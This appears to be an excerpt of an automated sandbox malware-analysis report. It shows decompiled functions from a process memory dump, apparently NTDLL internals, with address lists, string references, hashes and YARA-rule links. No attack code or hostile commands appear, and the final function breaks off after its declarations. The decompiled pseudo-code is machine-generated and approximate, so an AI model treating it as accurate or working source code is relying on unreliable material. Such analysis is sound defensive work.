Instruction Fuzzy Hash: 8A61E531A00649AFDB32DF6CC844B6EBBA5EB45718F24069DE711D73C2CB74DA418792

Uniqueness

Uniqueness Score: -1.00%

Function 018C0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E018C0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E018BFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E018C1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01839730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E018BA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E018BA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x18e8b04 >> 0x14) + (_v44 -  *0x18e8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01817D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E018B138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01817D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E018AFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x18e8724 & 0x00000008) != 0) {
						E018B52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E018C15B5(0x18e8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x018c0eb7
0x018c0eb9
0x018c0ec0
0x018c0ec2
0x018c0ecd
0x018c105b
0x018c105b
0x018c1061
0x018c1066
0x018c1066
0x018c106b
0x018c1073
0x018c1073
0x018c0ed3
0x018c0ed6
0x018c0edc
0x018c0ee0
0x018c0ee7
0x018c0ef0
0x018c0ef5
0x018c0efa
0x018c0efc
0x018c0efd
0x018c0f03
0x018c0f04
0x018c0f06
0x018c0f07
0x018c0f09
0x018c0f0e
0x018c0f14
0x018c0f23
0x018c0f2d
0x018c0f34
0x018c0f34
0x018c0f14
0x018c0f52
0x00000000
0x00000000
0x018c0f58
0x018c0f73
0x018c0f74
0x018c0f79
0x018c0f7d
0x018c0f80
0x018c0f86
0x018c0fab
0x018c0fb5
0x018c0fc6
0x018c0fd1
0x018c0fe3
0x018c0fd3
0x018c0fdc
0x018c0fdc
0x018c0feb
0x018c1009
0x018c1009
0x018c1015
0x018c1027
0x018c1017
0x018c1020
0x018c1020
0x018c102f
0x018c103c
0x018c103c
0x018c1048
0x018c1050
0x018c1050
0x018c1055
0x00000000
0x018c1055
0x018c0f88
0x018c0f9e
0x018c0fa2
0x018c0fa9
0x00000000
0x00000000
0x00000000
0x018c0fa9
0x00000000

Strings

`, xrefs: 018C0F16

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 5007ed37a56cfcabd322bbefde97d26be71098a3ce71c45afcdf50cb8fe8888d
Instruction ID: 8a19b63917832eb1b345dc7ce0e4cd05b469c4f9661e85e4b788a3ba67bb8436
Opcode Fuzzy Hash: 5007ed37a56cfcabd322bbefde97d26be71098a3ce71c45afcdf50cb8fe8888d
Instruction Fuzzy Hash: D4517C71204342DBD325DF28D9C4B1BBBE5EB84B44F04092CFA96D7291D671EA45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0182F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0182F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01814120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01839830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01839990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E018395D0();
							goto L11;
						} else {
							_t109 = L01814620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0183F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E018395D0();
										L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0182f0d3
0x0182f0d9
0x0182f0e0
0x0182f0e7
0x0182f0f2
0x0182f0f4
0x0182f0f8
0x0182f100
0x0182f108
0x0182f10d
0x0182f115
0x0182f116
0x0182f11f
0x0182f123
0x0182f124
0x0182f12c
0x0182f130
0x0182f134
0x0182f13d
0x0182f144
0x0182f14b
0x0182f152
0x0186bab0
0x0186bab0
0x0182f158
0x0182f158
0x0182f15a
0x0182f160
0x0182f165
0x0182f166
0x0182f16f
0x0182f173
0x0186baa7
0x0186baa7
0x0186baab
0x00000000
0x0182f179
0x0182f18d
0x0182f191
0x0186baa2
0x00000000
0x0182f197
0x0182f19b
0x0182f1a2
0x0182f1a9
0x0182f1af
0x0182f1b2
0x0182f1b6
0x0182f1b9
0x0182f1c4
0x0182f1d8
0x0182f1df
0x0182f1e3
0x0182f1eb
0x0182f1ee
0x0182f1f4
0x0182f20f
0x0186bab7
0x0186babb
0x0186bacc
0x0186bad1
0x0182f215
0x0182f218
0x0182f226
0x0182f22b
0x00000000
0x0182f22b
0x0182f1f6
0x0182f1f6
0x0182f1f9
0x0182f1fb
0x0182f1fb
0x0182f1f4
0x0182f191
0x0182f173
0x0182f152
0x0182f203

Strings

@, xrefs: 0182F124

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: ab41c96649981c235b90914f2d7a6562c337b2448f18017baf488859df12cc35
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: CE518D726007119BC321DF19C840A6BBBF8FF88714F10492DFA95C7690E7B4EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01873540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01873540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x18ed360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01830BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01873706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0183FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01873540;
						E0183FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0184DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01880C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E018397C0();
					}
					return E0183B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01873971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01873884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0183FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01839650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01873787(_a4,  &_v352, _t80);
						}
					}
					L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E018395D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01873552
0x0187355a
0x0187355d
0x01873566
0x01873567
0x0187357e
0x0187358f
0x018735a1
0x018735a5
0x0187366b
0x0187366b
0x0187366d
0x01873672
0x01873679
0x01873685
0x0187368d
0x0187369d
0x018736a7
0x018736b8
0x018736c6
0x018736c7
0x018736dc
0x018736e1
0x018736e7
0x018736e9
0x018736e9
0x01873703
0x01873703
0x018735b5
0x018735c0
0x018735c4
0x00000000
0x00000000
0x018735ca
0x018735d7
0x018735e2
0x018735e6
0x018735e8
0x018735f5
0x018735fa
0x01873603
0x01873604
0x01873609
0x0187360a
0x01873612
0x01873613
0x0187361e
0x01873622
0x01873628
0x0187362f
0x0187362f
0x01873636
0x01873638
0x0187363b
0x01873642
0x01873642
0x01873636
0x01873657
0x01873657
0x0187365c
0x01873662
0x01873669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0187358F

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 0878ecbdc2a06fe900b6168e1728fbf87327bcaf1d3dc4bf5131efe1c946aca1
Instruction ID: 7a65f36752f750d6204918ff982fd57b163d168cb9a1265df0e709da00d18ba9
Opcode Fuzzy Hash: 0878ecbdc2a06fe900b6168e1728fbf87327bcaf1d3dc4bf5131efe1c946aca1
Instruction Fuzzy Hash: F44141B2D0052D9BDB21DA54CC80FEEB77CAB44714F0045A5EA09EB241DB309F88DF96

Uniqueness

Uniqueness Score: -1.00%

Function 01873884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01873884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01839650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01814620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01839650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01873893
0x01873896
0x01873899
0x0187389f
0x018738a0
0x018738a4
0x018738a9
0x018738ac
0x018738ad
0x018738ae
0x018738af
0x018738b1
0x018738b4
0x018738bb
0x018738bc
0x018738bd
0x018738c4
0x018738c8
0x018738ca
0x018738ca
0x018738d5
0x0187393e
0x01873940
0x01873942
0x01873952
0x01873954
0x01873961
0x01873961
0x01873967
0x0187396e
0x0187396e
0x01873947
0x0187394c
0x00000000
0x0187394c
0x018738ea
0x018738ee
0x018738f8
0x018738f9
0x018738ff
0x01873900
0x01873902
0x01873903
0x0187390b
0x0187390f
0x01873950
0x00000000
0x01873950
0x01873915
0x0187391d
0x0187391d
0x01873922
0x01873926
0x00000000
0x01873928
0x0187392b
0x0187392b
0x01873935
0x01873937
0x01873937
0x00000000
0x01873935
0x01873926
0x018738f0
0x00000000

Strings

BinaryName, xrefs: 018738B4

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: a2567c89bf76d03936b0c18bc0c86c0fa64e56b904cbd2df1f58340c84e5bfe3
Instruction ID: 418a9defc1f6b4a99e0e2ec9762e589e0d5a6cdfb9d647c43ee883cd332efc92
Opcode Fuzzy Hash: a2567c89bf76d03936b0c18bc0c86c0fa64e56b904cbd2df1f58340c84e5bfe3
Instruction Fuzzy Hash: 4431F172D0150AAFEB16DA5CC945EABBB74FB82B20F014169ED14E7281D730DF00E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0182D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0182D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x18ed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01814120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0183B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E018398D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E018395D0();
					L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0182d29c
0x0182d2a6
0x0182d2b1
0x0182d2b5
0x0182d2b6
0x0182d2bc
0x0182d2bd
0x0182d2be
0x0182d2bf
0x0182d2c2
0x0182d2c4
0x0182d2cc
0x0182d384
0x0182d34b
0x0182d34f
0x0182d350
0x0182d351
0x0182d35c
0x0182d35c
0x0182d2d6
0x0182d2da
0x0182d2e1
0x0182d361
0x0182d369
0x0182d36d
0x0182d2e3
0x0182d2e3
0x0182d2e3
0x0182d2e5
0x0182d2ed
0x0182d2f5
0x0182d2fa
0x0182d302
0x0182d303
0x0182d30b
0x0182d30f
0x0182d313
0x0182d318
0x0182d31c
0x0182d320
0x0182d379
0x0182d37d
0x00000000
0x00000000
0x0186affe
0x0186b001
0x0186b011
0x00000000
0x0182d322
0x0182d322
0x0182d330
0x0182d337
0x0182d35d
0x0182d339
0x0182d33f
0x0182d38c
0x0182d38c
0x0182d33f
0x0182d349
0x00000000
0x0182d349

Strings

@, xrefs: 0182D303

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 90ec10d9a21a1f535506755085406e7030627396b1cfa9164a5d3d61ca2a6e93
Instruction ID: 937caac1edd19e11b38735c2690ca9af99f54903b9dc48b3ae34e4c4cd9b07a7
Opcode Fuzzy Hash: 90ec10d9a21a1f535506755085406e7030627396b1cfa9164a5d3d61ca2a6e93
Instruction Fuzzy Hash: 23318DB25083159FC312DF68C88496BBFE8EB85758F000A2EF994C3251E634DE44CB93

Uniqueness

Uniqueness Score: -1.00%

Function 01801B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01801B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0183BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0183A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0183A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01814620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01801b8f
0x01801b9a
0x01801b9c
0x01801b9e
0x01801ba3
0x01857010
0x01857010
0x00000000
0x01801ba9
0x01801ba9
0x01801bae
0x00000000
0x01801bc5
0x01801bca
0x01801bcf
0x01801bd0
0x01801bd1
0x01801bd2
0x01801bd6
0x01801bdc
0x01801be0
0x01856ffc
0x01857000
0x00000000
0x01857006
0x01857009
0x01857009
0x01801be6
0x01801bec
0x01801c0b
0x01801c0b
0x01801c0c
0x01801c11
0x01801c12
0x01801c15
0x01801c1b
0x01801c1f
0x01801c31
0x01801c33
0x01857026
0x01857026
0x01801c21
0x01801c24
0x01801c24
0x01801bee
0x01801bee
0x01801bf2
0x01801c3a
0x01801bf4
0x01801bf4
0x01801c05
0x01801c05
0x01801c09
0x01801c3e
0x00000000
0x00000000
0x00000000
0x01801c09
0x01801bec
0x01801be0
0x01801bae
0x01801c2e

Strings

WindowsExcludedProcs, xrefs: 01801BC5

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 3ea2eb8c7056970d518fb1e79159a694d2ae1b01543a92e3fc122b5d81a38d76
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 1E21C57B50122DABDBA39A5D8C44F5BBBADEF81B64F0A4425FE04DB240D630DF0097A1

Uniqueness

Uniqueness Score: -1.00%

Function 018A8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E018A8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x18d0d50);
				E0184D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01885720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0184DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0184DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0184D130(_t34, _t39, _t40);
			}

0x018a8df1
0x018a8df1
0x018a8df1
0x018a8df1
0x018a8df1
0x018a8df1
0x018a8df3
0x018a8df8
0x018a8dfd
0x018a8e00
0x018a8e0e
0x018a8e2a
0x018a8e36
0x018a8e38
0x018a8e3c
0x018a8e46
0x018a8e46
0x018a8e36
0x018a8e50
0x018a8e56
0x018a8e59
0x018a8e5c
0x018a8e60
0x018a8e67
0x018a8e6d
0x018a8e73
0x018a8e74
0x018a8eb1
0x018a8ebd

Strings

Critical error detected %lx, xrefs: 018A8E21

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: eb8d041b0d309d7d388eab63cb0a7065a2cf97a930dbfa90f308264e3779d2f4
Instruction ID: 79036ca1a4cffa2a936583d7db63ce072df7cb3f24cf8db7f23d637cddc4f570
Opcode Fuzzy Hash: eb8d041b0d309d7d388eab63cb0a7065a2cf97a930dbfa90f308264e3779d2f4
Instruction Fuzzy Hash: 571175B1D00348EBEF24DFA8850979CBBB0AB15315F20821EE669EB282C7340702CF25

Uniqueness

Uniqueness Score: -1.00%

Function 0188FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0188FF60

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 2a2b656936ad11bf715c6c13df42ac32222adf90230de7929cd5a7b93977ef93
Instruction ID: 44a31a823c8f85c4e00693cbade635b34c46c5e6158ffa639863dcb18c223e45
Opcode Fuzzy Hash: 2a2b656936ad11bf715c6c13df42ac32222adf90230de7929cd5a7b93977ef93
Instruction Fuzzy Hash: 1311C471950548EFDB22EB58C948F98BBF1FF19714F148054F604EB261CB399B50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018C5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E018C5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
